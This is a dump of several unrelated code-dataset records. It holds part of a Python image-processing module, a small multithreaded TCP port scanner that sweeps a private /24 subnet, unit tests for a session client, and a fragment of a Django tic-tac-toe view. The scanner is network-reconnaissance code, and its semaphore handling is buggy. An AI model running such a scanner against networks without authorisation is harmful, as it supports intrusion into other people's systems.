tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE))  # resizing\n        # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n        self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n        return rgb_tensor\n\n\ndef convert_h5_to_LSTM_h5(h5_file_list, lstm_h5_name, lstm_len=7, batch_size=100, label_key='labels', IMG_SIZE=96,\n                          disable_tqdm=False):\n    \"\"\"\n    convert any H5 files with the 3 color channels into the LSTM format, then use image_tools.ImageBatchGenerator_simple\n    to draw directly from the H5 files and save the time of converting them in the generator each time\n    Parameters\n    ----------\n    h5_file_list :\n    lstm_h5_name :\n    lstm_len :\n    batch_size :\n    label_key :\n    IMG_SIZE :\n    disable_tqdm :\n\n    Returns\n    -------\n\n    \"\"\"\n    utils.make_list(h5_file_list, suppress_warning=True)\n    G = ImageBatchGenerator_LSTM(lstm_len, batch_size, h5_file_list, label_key=label_key, IMG_SIZE=IMG_SIZE)\n    Path(os.path.dirname(lstm_h5_name)).mkdir(parents=True, exist_ok=True)\n    h5creator = h5_iterative_creator(lstm_h5_name)\n    for k in tqdm(range(G.__len__()), disable=disable_tqdm):\n        x, y = G.__getitem__(k)\n        h5creator.add_to_h5(x, y)\n    frame_nums = get_h5_key_and_concatenate(h5_file_list, 'frame_nums')\n    utils.force_write_to_h5(h5creator.h5_full_file_name, frame_nums, 'frame_nums')\n\n\n#\n# class ImageBatchGenerator_feature_array(keras.utils.Sequence):\n#     \"\"\" \"\"\"\n#\n#     def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', feature_len=2048,\n#                  label_index_to_lstm_len=None):\n#         assert lstm_len % 2 == 1, \"number of images must be odd\"\n#         if label_index_to_lstm_len is None:\n#             label_index_to_lstm_len = lstm_len // 2  # in the middle\n#         h5_file_list = 
utils.make_list(h5_file_list, suppress_warning=True)\n# num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n# file_inds_for_H5_extraction = batch_size_file_ind_selector(\n# num_frames_in_all_H5_files, batch_size)\n# subtract_for_index = reset_to_first_frame_for_each_file_ind(\n# file_inds_for_H5_extraction)\n# # self.to_fit = to_fit #set to True to return XY and False to return X\n# self.label_key = label_key\n# self.batch_size = batch_size\n# self.H5_file_list = h5_file_list\n# self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n# self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n# self.subtract_for_index = subtract_for_index\n# self.label_index_to_lstm_len = label_index_to_lstm_len\n# self.lstm_len = lstm_len\n# self.feature_len = feature_len\n# self.get_frame_edges()\n#\n# def get_frame_edges(self):\n# self.all_edges_list = []\n# b = self.lstm_len // 2\n# self.lstm_len\n# self.feature_len\n# s = [b * 2, self.lstm_len, self.feature_len]\n# for H5_file in self.H5_file_list:\n# with h5py.File(H5_file,\n# 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n# full_edges_mask = np.ones(s)\n# edge_ind = np.flip(np.arange(1, b + 1))\n# for i in np.arange(1, b + 1):\n# full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n# full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n# full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n# full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n# all_edges = []\n# for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n# edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n# all_edges.append(edges)\n# all_edges = np.asarray(all_edges)\n# self.all_edges_list.append(all_edges)\n# full_edges_mask = full_edges_mask.astype(int)\n# self.full_edges_mask = full_edges_mask == 0\n#\n# def __getitem__(self, num_2_extract):\n# h = self.H5_file_list\n# i = self.file_inds_for_H5_extraction\n# all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n# H5_file = h[np.int(i[num_2_extract])]\n# num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n# with h5py.File(H5_file, 'r') as h:\n# b = self.lstm_len // 2\n# tot_len = h['images'].shape[0]\n# assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n# tot_len - b - 1)\n# i1 = num_2_extract_mod * self.batch_size - b\n# i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n# edge_left_trigger = abs(min(i1, 0))\n# edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n# x = h['images'][max(i1, 0):min(i2, tot_len)]\n# if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n# pad_shape = list(x.shape)\n# pad_shape[0] = edge_left_trigger + edge_right_trigger\n# pad = np.zeros(pad_shape).astype('uint8')\n# if edge_left_trigger > edge_right_trigger:\n# x = np.concatenate((pad, x), axis=0)\n# else:\n# x = np.concatenate((x, pad), axis=0)\n# x = self.image_transform(x)\n# s = list(x.shape)\n# s.insert(1, self.lstm_len)\n# out = np.zeros(s).astype('float32') # before was uint8\n# # out = tf.cast(out, tf.float32)\n#\n# for i in range(self.lstm_len):\n# i1 = max(0, b - i)\n# i2 = min(s[0], s[0] + b - i)\n# i3 = max(0, i - b)\n# i4 = min(s[0], s[0] + i - b)\n# # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n# out[i1:i2, i, ...] 
= x[i3:i4, ...]\n# out = out[b:s[0] - b, ...]\n# i1 = num_2_extract_mod * self.batch_size\n# i2 = num_2_extract_mod * self.batch_size + self.batch_size\n# raw_Y = h[self.label_key][i1:i2]\n# # black out edges from frame to frame\n# adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n# for atef in adjust_these_edge_frames:\n# # mask_ind = np.where(atef == all_edges)[1][0]\n# # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n#\n# mask_ind = np.where(atef == all_edges)[1][0]\n# mask_ = self.full_edges_mask[mask_ind]\n# out[atef - i1][mask_] = -1\n# return out, raw_Y\n#\n# # gray mask(set array to -1 not 0 ),DONE\n# # doesnt fill the edges as expected, DONE\n# # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n# # need to test this with uneven frames\n# def __len__(self):\n# return len(self.file_inds_for_H5_extraction)\n#\n# def getXandY(self, num_2_extract):\n# \"\"\"\n#\n# Parameters\n# ----------\n# num_2_extract :\n#\n#\n# Returns\n# -------\n#\n# \"\"\"\n# rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n# return rgb_tensor, raw_Y\n#\n# def image_transform(self, raw_X):\n# \"\"\"input num_of_images x H x W, image input must be grayscale\n# MobileNetV2 requires certain image dimensions\n# We use N x 61 x 61 formated images\n# self.IMG_SIZE is a single number to change the images into, images must be square\n#\n# Parameters\n# ----------\n# raw_X :\n#\n#\n# Returns\n# -------\n#\n#\n# \"\"\"\n# rgb_batch = copy.deepcopy(raw_X)\n# # if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n# # rgb_batch = copy.deepcopy(raw_X)\n# # else:\n# # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n# rgb_tensor = rgb_batch\n# # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n# rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n# # rgb_tensor = tf.image.resize(rgb_tensor, (self.feature_len)) # resizing\n# # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n# self.IMG_SHAPE = (self.feature_len)\n# return rgb_tensor\n\nclass ImageBatchGenerator_feature_array(keras.utils.Sequence):\n\n def __init__(self, time_length, batch_size, h5_file_list, label_key='labels', feature_len=None,\n label_index_to_lstm_len=None, edge_value=-1, remove_any_time_points_with_edges=True):\n \"\"\"\n\n Parameters\n ----------\n time_length : total time points\n batch_size : batch output for generator, if set to None then will default to all frames which may use all your RAM\n h5_file_list : list of h5 strings or single h5 string\n label_key : where y output comes from\n feature_len : length of the features per time point\n label_index_to_lstm_len : determines look back and look forward index refers to where the 'current' time point is\n within the range of look_back_len; e.g. look_back_len = 7 label_index_to_lstm_len = 3 (middle index of 7) then\n time point 0 will be at 3 and index 0, 1, 2 will be the past values and index 4, 5, 6 will be the future values.\n look_back_len = 7 label_index_to_lstm_len = 0 (first index) then current time point will be at index 0 and all\n other time point (1, 2, 3, 4, 5, 6) will be future values. 
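As a concrete illustration of the indexing described above (same numbers as the\n        example already given): with time_length = 7 and label_index_to_lstm_len = 3 the window\n        for time point t covers [t-3, t-2, t-1, t, t+1, t+2, t+3], while label_index_to_lstm_len = 0\n        yields the all-future window [t, t+1, t+2, t+3, t+4, t+5, t+6].\n        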
Default is middle time point\n edge_value : what to replace the edge values with, when time shifting you will have edges with no value, this\n will replace those values with this number.\n remove_any_time_points_with_edges : if true then batch size will not be the actual batch size it will be batch\n size - the number of time points with edges in them, x and y will still match and this method is preferred for\n training due to it not including unknown values.\n \"\"\"\n assert time_length % 2 == 1, \"number of images must be odd\"\n if label_index_to_lstm_len is None:\n label_index_to_lstm_len = time_length // 2 # in the middle\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n if batch_size is None:\n batch_size = int(np.sum(num_frames_in_all_H5_files))\n\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n self.remove_any_time_points_with_edges = remove_any_time_points_with_edges\n self.label_key = label_key\n\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.label_index_to_lstm_len = label_index_to_lstm_len\n self.lstm_len = time_length\n self.feature_len = feature_len\n self.edge_value = edge_value\n if remove_any_time_points_with_edges:\n self.edge_value = np.nan\n print(\n 'remove_any_time_points_with_edges == True : forcing edge_value to np.nan to aid in removing these time points')\n\n self.get_frame_edges()\n # self.full_edges_mask = self.full_edges_mask - (self.lstm_len // 2 - self.label_index_to_lstm_len)\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n\n # assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n # tot_len - b - 1)\n\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('float32')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n Z = self.label_index_to_lstm_len - self.lstm_len // 2\n for i in range(self.lstm_len):\n i_temp = i\n i = i - Z\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3, ' to ', i4, ' and place in ', i1, ' to ', i2)\n out[i1:i2, i_temp, ...] 
= x[i3:i4, ...]\n\n out = out[b:s[0] - b, ...]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n raw_Y = h[self.label_key][i1:i2]\n\n adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n b2 = b - self.label_index_to_lstm_len # used to adjust mask postion based on where the center value is\n for atef in adjust_these_edge_frames:\n mask_ind = np.where(atef == all_edges)[1][0]\n mask_ind = mask_ind - b2\n mask_ind = mask_ind % self.full_edges_mask.shape[0] # wrap around index\n\n mask_ = self.full_edges_mask[mask_ind]\n mask_ = mask_ == 1\n out_ind = atef + i1 - b2\n out_ind = out_ind % out.shape[0] # wrap around index\n out[out_ind][mask_] = self.edge_value\n\n s = out.shape\n out = np.reshape(out, (s[0], s[1] * s[2]))\n if self.remove_any_time_points_with_edges:\n keep_inds = ~np.isnan(np.mean(out, axis=1))\n out = out[keep_inds]\n raw_Y = raw_Y[keep_inds]\n\n return out, raw_Y\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n \"\"\"\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n # kept this cause this is the format of the image generators I know this is redundant\n rgb_batch = copy.deepcopy(raw_X)\n rgb_tensor = rgb_batch\n self.IMG_SHAPE = (self.feature_len)\n return rgb_tensor\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n\n s = [b * 2, self.lstm_len, self.feature_len]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file, 'r') as h:\n full_edges_mask = np.ones(s)\n tmp1 = np.arange(1, self.lstm_len)\n front_edge = tmp1[:self.label_index_to_lstm_len]\n back_edge = tmp1[:self.lstm_len - self.label_index_to_lstm_len - 1]\n\n edge_ind = np.flip(front_edge)\n for i in front_edge:\n # print(i - 1, ':', edge_ind[i - 1])\n # print(full_edges_mask[i - 1, :edge_ind[i - 1], ...].shape)\n # print('\\n')\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n\n edge_ind = np.flip(back_edge)\n for i in back_edge:\n # print(-i, -edge_ind[i - 1], ':')\n # print(full_edges_mask[-i, -edge_ind[i - 1]:, ...].shape)\n # print('\\n')\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] 
= np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n\ndef rename_h5_key_from_images_to_feature(h5_in):\n if isinstance(h5_in, list):\n for k in h5_in:\n rename_h5_key_from_images_to_feature(k)\n return\n\n if utils.h5_key_exists(h5_in, 'images'):\n print(\"\"\"'images' exists, changing it to 'FD__original'\"\"\")\n with h5py.File(h5_in, 'r+') as h:\n h['FD__original'] = h['images'][:]\n del h['images']\n else:\n print(\"\"\"'images' key does not exist, skipping\"\"\")\n\n\n# apply the below on the files and combine the things we need to combine\ndef combine_and_index_feature_data(h5s_to_combine, new_h5, label_key='labels', feature_key='FD__original'):\n h5c = h5_iterative_creator(new_h5,\n overwrite_if_file_exists=True,\n max_img_height=1,\n max_img_width=2048,\n close_and_open_on_each_iteration=True,\n color_channel=False,\n add_to_existing_H5=False,\n ignore_image_range_warning=False,\n dtype_img=h5py.h5t.IEEE_F32LE,\n dtype_labels=h5py.h5t.IEEE_F32LE)\n\n h5_lengths = []\n h5_inds_each = []\n inds_to_h5_file_names = []\n frame_nums_all = []\n for i, k in enumerate(tqdm(h5s_to_combine)):\n features = get_h5_key_and_concatenate(k, feature_key)\n y = get_h5_key_and_concatenate(k, label_key)\n\n h5c.add_to_h5(features, y)\n\n h5_lengths.append(len(y))\n h5_inds_each.append(np.arange(len(y)))\n inds_to_h5_file_names.append(np.zeros(len(y)).astype(int) + i)\n\n frame_nums_all.append(get_h5_key_and_concatenate(k, 'frame_nums').astype(int))\n\n h5s_to_combine = [n.encode(\"ascii\", \"ignore\") for n in h5s_to_combine]\n rename_h5_key_from_images_to_feature(new_h5)\n\n with h5py.File(new_h5, 'r+') as h:\n h['all_combined_h5_names'] = h5s_to_combine\n h['h5_lengths'] = np.asarray(h5_lengths).astype(int)\n h['h5_inds_all'] = np.arange(np.sum(h5_lengths)).astype(int)\n h['h5_inds_each'] = np.hstack(h5_inds_each).astype(int)\n h['inds_to_h5_file_names'] = np.hstack(inds_to_h5_file_names).astype(int)\n h['frame_nums'] = np.hstack(frame_nums_all).astype(int)\n h['has_data_been_randomized'] = False\n\n\ndef randomize_original_feature_data_and_inds(h5_in, rand_seed=1):\n assert rand_seed is not None, \"\"\"random seed can't be None, otherwise inds and data will not match!!!\"\"\"\n\n with h5py.File(h5_in, 'r+') as h:\n np.random.seed(rand_seed)\n h['h5_inds_all'][:] = np.random.permutation(h['h5_inds_all'][:])\n np.random.seed(rand_seed)\n h['h5_inds_each'][:] = np.random.permutation(h['h5_inds_each'][:])\n np.random.seed(rand_seed)\n h['inds_to_h5_file_names'][:] = np.random.permutation(h['inds_to_h5_file_names'][:])\n np.random.seed(rand_seed)\n h['FD__original'][:, :] = np.random.permutation(h['FD__original'][:, :])\n\n h['has_data_been_randomized'] = True\n\n\ndef check_if_permuted_h5_matches_og_h5_indexes(h5_1, ind):\n with h5py.File(h5_1, 'r') as h:\n i1 = np.where(h['h5_inds_all'][:] == ind)[0]\n x1 = h['inds_to_h5_file_names'][i1]\n print(h['all_combined_h5_names'][x1])\n print(h['h5_inds_all'][i1])\n print(h['h5_inds_each'][i1])\n print(x1)\n print(h['FD__original'][i1, :])\n\n\ndef get_rand_bool_inds(h5_in, split_segs=None, rand_seed=1, label_key='labels', write_to_h5=True):\n assert rand_seed 
is not None, \"\"\"random seed can't be None, otherwise inds and data will not match!!!\"\"\"\n if split_segs is None:\n split_segs = get_h5_key_and_concatenate(h5_in, 'split_segs')\n L = len(get_h5_key_and_concatenate(h5_in, label_key))\n np.random.seed(rand_seed)\n permuted_inds = np.random.permutation(np.arange(L))\n all_bool_inds = np.zeros([split_segs.shape[1], L], dtype=bool)\n for i, k in enumerate(split_segs.T):\n i1, i2 = k[0], k[1]\n perm_ind = np.sort(permuted_inds[i1:i2])\n permuted_inds[i1:i2] = perm_ind\n for kk in perm_ind:\n all_bool_inds[i, kk] = True\n if write_to_h5:\n utils.overwrite_h5_key(h5_in, 'permuted_inds', permuted_inds)\n utils.overwrite_h5_key(h5_in, 'all_bool_inds', all_bool_inds)\n return permuted_inds, np.asarray(all_bool_inds)\n\n\ndef divide_data_indexing(h5_in, split_names=['train', 'val', 'test'], split_percent_single=[0.7, 0.15, 0.15],\n max_len_each_set=10000, label_key='labels', write_to_h5=True):\n L = len(get_h5_key_and_concatenate(h5_in, label_key))\n num_divs = int(np.ceil(L / max_len_each_set))\n split_percent_single = list(split_percent_single/np.sum(split_percent_single))\n\n split_percentages = split_percent_single * num_divs\n array_inds = np.arange(L)\n split_percentages = split_percentages / np.sum(split_percentages)\n segment_inds = list(np.split(array_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int')))\n tmp1 = [0]\n _ = [tmp1.append(k[-1]) for k in segment_inds]\n split_segs = np.asarray(utils.loop_segments(np.diff(tmp1), returnaslist=True))\n\n tmp2 = split_names * num_divs\n tmp3 = np.repeat(list(range(num_divs)), 3)\n split_segs_names = [i1 + '_num_' + str(i2) + '_percent_' + str(int(100*i3)) for i1, i2, i3 in\n zip(tmp2, tmp3, split_percent_single * num_divs)]\n if write_to_h5:\n utils.overwrite_h5_key(h5_in, 'split_segs', split_segs)\n utils.overwrite_h5_key(h5_in, 'split_segs_names', utils.convert_list_of_strings_for_h5(split_segs_names))\n\n return split_segs, split_segs_names\n\ndef convert_to_3lag(f, f2):\n \"\"\"\n Parameters\n ----------\n f : base file\n f2 : new 3lag file (doesn't exist yet\n \"\"\"\n assert f != f2, \"\"\"can't be the same file\"\"\"\n if os.path.isfile(f2):\n utils.open_folder(os.path.dirname(f2))\n assert False, \"\"\"\\nthe 3lag file you want to create already exists please delete it you you want to overwrite\\n\"\"\" + f2 + \"\\nopening folder...\"\n utils.stack_lag_h5_maker(f, f2, buffer=2, shift_to_the_right_by=0)\n utils.copy_over_all_non_image_keys(f, f2)\n","repo_name":"hireslab/whacc","sub_path":"whacc/image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":88984,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18298823426","text":"import optparse\nimport socket\nimport threading\nimport os, subprocess\nimport ipaddress\n\nglobal port_list, sbnet\n\nport_list= [22,80,257,443,4434,8080,19009]\nsbnet = ipaddress.ip_network('10.100.100.0/24')\n\nsocket.setdefaulttimeout(1)\nscreenLock = threading.Semaphore(value = 1)\n#os.popen('ulimit -n 5000').read()\nsubprocess.Popen('#!/bin/bash ulimit -n 6000', shell=True)\n\n\ndef connScan(ip, port):\n\t'''probe tcp socket connection by given port and ip'''\n\tconnskt = socket.socket(family=socket.AddressFamily.AF_INET, type=socket.SocketKind.SOCK_STREAM, proto=6)\n\tconnskt.settimeout(2)\n\t#screenLock.acquire()\n\ttry:\n\t\tconnskt.connect((ip, port))\n\t\tconnskt.send(b'Hello Python\\r\\n')\n\t\tres = connskt.recv(50)\n\t\t#hostname = 
socket.gethostbyaddr(ip)\n\t\tprint('port: %d is opening on host %s' %(port, ip))\n\t\t#print('result: %s' %res)\n\t\tconnskt.close()\n\texcept Exception as e: \n\t\t#screenLock.acquire()\n\t\t#print(e)\n\t\t#print('port: %d is not opened on host %s.' %(port, ip))\n\t\t#screenLock.release()\n\t\tpass\n\tfinally:\n\t\tscreenLock.release()\n\t\tconnskt.close()\n\ndef main():\n\tfor i in sbnet:\n\t\tfor p in port_list: \n\t\t\tt = threading.Thread(target=connScan, args=(str(i),int(p)))\n\t\t\tt.start()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liuxun931/py_practice_scripts","sub_path":"chapter02/chapter2-portScan.py","file_name":"chapter2-portScan.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69800752196","text":"\"\"\"Tests for the radar session object.\"\"\"\nimport os\nimport socket\nimport unittest\nfrom unittest import mock\n\nimport test_radar_common\nfrom mlre.radar import radar_common, radar_session\n\n\nclass TestRadarSession(unittest.TestCase):\n \"\"\"Tests for the radar session object.\"\"\"\n\n def setUp(self) -> None:\n \"\"\"Sets up the APIClient mock.\"\"\"\n self.patcher = mock.patch('mlre.radar.radar_api_client.APIClient')\n self.patched_api_client_type = self.patcher.start()\n\n def tearDown(self) -> None:\n \"\"\"Tears down the APIClient mock.\"\"\"\n self.patcher.stop()\n\n def test_server_default(self) -> None:\n \"\"\"Tests if the Session uses localhost by default.\"\"\"\n if 'RADAR_SERVER' in os.environ.keys():\n del os.environ['RADAR_SERVER']\n\n with radar_session.RadarSession():\n self.assertEqual(1, self.patched_api_client_type.call_count)\n\n # Test correct hostname\n self.assertEqual('https://127.0.0.1:5000/',\n self.patched_api_client_type.call_args[0][0])\n\n def test_server_environ(self) -> None:\n \"\"\"Tests if the Session uses the environment variable RADAR_SERVER.\"\"\"\n os.environ['RADAR_SERVER'] = test_radar_common.TEST_ENDPOINT\n\n with radar_session.RadarSession():\n self.assertEqual(1, self.patched_api_client_type.call_count)\n\n # Test correct hostname\n self.assertEqual(test_radar_common.TEST_ENDPOINT,\n self.patched_api_client_type.call_args[0][0])\n\n def test_reports_client_info(self) -> None:\n \"\"\"Tests if the Session reports client information after connecting.\"\"\"\n self.test_server_default()\n\n self.assertEqual(\n 1, self.patched_api_client_type.return_value.report_client_info.call_count)\n\n # Check for correctness of client info\n actual_client_info: radar_common.ClientInfo =\\\n self.patched_api_client_type.return_value.report_client_info.call_args[\n 0][0]\n expected_client_info = radar_common.ClientInfo(\n socket.gethostname(), os.environ) # type: ignore\n\n self.assertEqual(expected_client_info, actual_client_info)\n\n def test_reports_session_start_event(self) -> None:\n \"\"\"Tests if the Session reports a start event after connecting.\"\"\"\n if 'RADAR_SERVER' in os.environ.keys():\n del os.environ['RADAR_SERVER']\n\n with radar_session.RadarSession():\n self.assertEqual(\n 1, self.patched_api_client_type.return_value.report_event.call_count)\n\n # Check for correctness of start event\n actual_identifier: radar_common.EventIdentifier =\\\n self.patched_api_client_type.return_value.report_event.call_args[\n 0][0]\n expected_identifier = radar_common.EventIdentifier(\n severity=radar_common.Severity.INFO,\n location=\"mlre.radar.radar_session\",\n description=\"Session started\")\n\n 
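# call_args[0][0] is the first positional argument of the mocked report_event\n        # call, i.e. the identifier the session actually reported on startup.\n        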
self.assertEqual(expected_identifier, actual_identifier)\n\n    def test_reports_session_end_event(self) -> None:\n        \"\"\"Tests if the Session reports an end event when exiting the session.\"\"\"\n\n        # Session should be concluded after this\n        self.test_server_default()\n\n        # 2 because it includes both start and end events\n        self.assertEqual(\n            2, self.patched_api_client_type.return_value.report_event.call_count)\n\n        # Check for correctness of end event\n        actual_identifier: radar_common.EventIdentifier =\\\n            self.patched_api_client_type.return_value.report_event.call_args[\n                0][0]\n        expected_identifier = radar_common.EventIdentifier(\n            severity=radar_common.Severity.INFO,\n            location=\"mlre.radar.radar_session\",\n            description=\"Session ended\")\n\n        self.assertEqual(expected_identifier, actual_identifier)\n","repo_name":"cabrust/mlre","sub_path":"tests/test_radar_session.py","file_name":"test_radar_session.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"6622986032","text":"from django.shortcuts import render\r\n# from bs4 import BeautifulSoup\r\nfrom .models import Score\r\n# import pyrebase\r\n# Create your views here.\r\ndef index(request):\r\n    return render(request,\"index.html\")\r\ndef game(request):\r\n\r\n    return render(request,'game.html')\r\ndef submit(request):\r\n    if request.method==\"POST\":\r\n        \r\n        #----------------------------------initial logic--------------------------------------------\r\n        # a=[request.POST['1'],request.POST['2'],request.POST['3']\r\n        # ,request.POST['4'],request.POST['5'],request.POST['6']\r\n        # , request.POST['7'],request.POST['8'],request.POST['9']]\r\n        # print(a)\r\n        one=request.POST['winner']\r\n        print(one)\r\n        n1=request.POST['name1']\r\n        n2=request.POST['name2']\r\n        print(n1+\" \"+n2)\r\n        #----------------------------------initial logic--------------------------------------------\r\n        # if a[0] == '1' and a[4] == '1' and a[8] == '1' or a[6] == '1' and a[4] == '1' and a[2] == '1' or a[0] == '1' and a[1] == '1' and a[2] == '1' or a[3] == '1' and a[4] == '1' and a[5] == '1' or a[6] == '1' and a[7] == '1' and a[8] == '1' or a[2] == '1' and a[5] == '1' and a[8] == '1' or a[1] == '1' and a[4] == '1' and a[7] == '1' or a[0] == '1' and a[3] == '1' and a[6] == '1':\r\n        # #checking possible 3 1's manually \r\n        #     win=n1+\" winner\"\r\n        #     score=Score(Name=n1,Won=True)\r\n        #     score.save()\r\n        #     win=n1+\" winner\"\r\n        #     score=Score(Name=n2)\r\n        #     score.save()\r\n        #     print(\"name1\")\r\n        # elif ((a[0]=='0' and a[4]=='0' and a[8]=='0') or (a[6]=='0'and a[4]=='0' and a[2]=='0') or (a[0]=='0'and a[1]=='0' and a[2]=='0') or (a[3]=='0'and a[4]=='0' and a[5]=='0') or (a[6]=='0'and a[7]=='0' and a[8]=='0') or (a[2]=='0'and a[5]=='0' and a[8]=='0') or (a[1]=='0'and a[4]=='0' and a[7]=='0') or (a[0]=='0'and a[3]=='0' and a[5]=='0')):#checking possible 3 0's manually \r\n        \r\n        #     win =n2+\" winner\"\r\n        #     score=Score(Name=n2,Won=True)\r\n        #     score.save()\r\n        #     win=n1+\" winner\"\r\n        #     score=Score(Name=n1)\r\n        #     score.save()\r\n        #     print(\"name2\")\r\n        if n1==\"\":\r\n            n1=\"Player 1\"\r\n        if n2==\"\":\r\n            n2=\"Player 2\"\r\n        \r\n        \r\n        if one=='X':\r\n            win = n1 + \" winner\"\r\n            # score = Score(Name=n1, Won=True)\r\n            # score.save()\r\n            # score = Score(Name=n2)\r\n            # score.save()\r\n            \r\n            if n1 !=\"Player 1\":\r\n                try:\r\n                    g=Score.objects.get(Name=n1)\r\n                    print(g.Won)\r\n                    g.Won=g.Won+1\r\n                    g.save()\r\n                except:\r\n                    g=Score(Name=n1,Won=1,Lost=0)\r\n                    g.save()\r\n            if n2 !=\"Player 
